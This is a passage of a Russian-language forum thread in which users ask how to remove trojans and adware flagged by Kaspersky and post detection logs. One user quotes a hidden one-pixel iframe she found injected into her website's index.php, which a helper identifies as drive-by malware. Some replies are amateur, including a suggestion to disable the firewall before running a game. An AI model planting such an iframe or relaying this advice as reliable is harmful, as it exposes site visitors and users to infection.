• Уважаемый посетитель!!!
    Если Вы уже являетесь зарегистрированным участником проекта "миХей.ру - дискусcионный клуб",
    пожалуйста, восстановите свой пароль самостоятельно, либо свяжитесь с администратором через Телеграм.

Как избавиться от троянов?

• Автор темы Автор темы Альпа
  • Дата начала Дата начала
Lafiera
Тогда просмотреть в исходных кодах своего сайта вредоносного кода (например, поиском по той ссылке)

Trotil
Я нашла вот это в странице index.php:
<iframe src='http://81.****/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Я загрузила страницу со своего компа вместо этой, пока все хорошо) спасибо!

Lafiera
Типичный встраиваемый вредоносный код... Через iframe, используя брешь в системе безопасности в IE. Теперь нужно поменять пароли у сайта (да и не только).

Привет Всем!!! пожалуйста помогите!!! Увидела что-то похожие на мою проблему
В компах мало разбираюсь, а темболее в аирусах и всякой гадосте!"!!!
""""приложение Win32/RAdmin.22 найден в оперативной памяти. Инфeкция cиcтeмнoй пaмяти пpoиcxoдит из фaйлa C:\windows\system32\r_server.exe."""""
пожалуйста помогите понять что это и как с этим распрощаться????

у меня вылезло вот это, после проверки каспрским. Я в компах ноль полный. Поможите, не знаю как это самой сделать.C:\WINDOWS\ds3d43.exe Зараженный объект: not-a-virus:AdWare.Win32.Virtumonde.djh пропустить

C:\WINDOWS\system32\BTCPatcher.exe Зараженный объект: Trojan-Dropper.Win32.Agent.dky пропустить
C:\WINDOWS\system32\ddccyax.dll Зараженный объект: not-a-virus:AdWare.Win32.Virtumonde.djh
и как это в надёжном режиме?

Змиючка_Оленка
Удаляй.

Свежие у тебя вирусы. Совсем недавно появились.

Змиючка_Оленка
С вирусами такой номер проходит не всегда... А Касперский не предложил тебе их удалить?

неа, япроверяла через он лаин скан.
эх зараза, как же мне от них избавиться, у меня комп сам загружается по ночам, ищез виндовс лайф мессенжер, и удаляю что-то, а оно опять после загрузки появляется, страшно в почтовый ящик смотреть, может меня кто-то шпионит. Паранойа полная

всё, здох комп, с 19: 45 вчерашнего времени грузится, вот только сейчас картинка с антивирусом касперского выплыла. Надо переустанавливать виндовс? А где его взять? В смысле скачать с номером серийным. ( у меня пока ноутбук здоровенький). И если я его по новому установлю на диск С из второго диска смогу вытащить архивы?

Змиючка_Оленка написал(а):
с 19: 45 вчерашнего времени грузится, вот только сейчас картинка с антивирусом касперского выплыла.
Я ничего не понял в вашем объяснении, следовательно - и помочь не могу.
А где его взять?
http://mixei.ru/showthread.php?p=1955917#post1955917

И если я его по новому установлю на диск С из второго диска смогу вытащить архивы?
Должны, если ничего не напутаете.

только хотела сказать, что комп идёт ооочень медленно, нет возможности ни скачать чего, ни запустить чего. Пример: жму на иконку мой РС и проходит около часа, иконка темнеет, но не открывается. Выключить комп только резетом могу.

Змиючка_Оленка
Да уж... Никогда с таким не сталкивался.

Намного быстрее будет переустановить.

Помогите мне, пожалуйста!

Когда я пытаюсь загрузить The Sims 2, Касперский выдаёт:"Обнаружено опасное ПО: Invade. Возможно, этот файл может повредить компьютер. Что вы хотите сделать?" И три конпки - "Запретить", "Разрешить", "Пропустить". Своей чайниковой головушкой я дотумкала, что это, скорее всего троян, и нажала "Запретить", но Касперский повторяет своё сообщение, и игра не запускается. В Диспетчере Задач The Sims 2 есть, но рядом ниже тот самый файл-троян - ~e5.0001. Я нашла папку с ним, проверила Каспером, но он ничего не обнаружил. Тогда я вручную удалила этот файл со всеми прилагающими папками и файлами, но при попытке снова запустить игру он "возрождается", то есть снова появляется там, откуда его удалили. Пожалуйста, помогите мне! Из-за него уже 3 раза переустанавливала компьютер! И если это возможно, попонятней объясняйте свои действия. Может, нужно дополнительное програмное обеспечение?

Скажите пожалуйста, вы решили эту проблему? И если решили, то как?

Trotil
Да в том то и дело, что ни на что.
Проблема в том, что игра не запускается, я ее описала в теме " Проблемы с запуском оригинальной игры The Sims 2 и аддонов"
У меня лицензионная игра и два лицензионных дополнения - бизнес и сезоны. До установки дополнений игра отлично работала год, после установки дополнений игра тоже работала где-то три месяца, а потом перестала запускаться. Я знаю, что часто грешат на папку даунлоадс, поэтому первым делом решила проверить ее и удалить если нужно, но по адресу C:\Documents and Settings\Пользователь\Мои документы\EA Games\The Sims 2 было абсолютно пусто, игра при неудачном запуске все удалила.
Я проверила диспетчер задач Windows и обнаружила что очень сильно буксует один процесс ~e5.0001, я решила, что проблема в сезонах, переустановила их, ничего не помогает, при попытке запустить все так же этот же самый процесс грузит процессор на 100% и ничего невозможно сделать, если вручную его не прервать.
Я сделала анинстал всех дополнений и самой игры, почистила все папки, какие нашла, посмотрела реестр, там пусто.
Установила оригинальных симов, игра запустилась. Вышла из игры, запускаю заново, все повторяется, процесс ~e5.0001 опять грузит комп и больше игра не запускается.
Через "пуск - найти - файлы и папки" - я находила ~e5.0001 несколько штук в папке Temp, удалила, но они снова появляются.

А меня отправили в технический раздел.
У Megumi-chan была такая же проблема, вот я подумала, что может она поможет.

Brizella, аутпост или какой-нибудь брандмауэр стоит? Если "да", то перед запуском игры попробуйте отключить его.

Назад
Сверху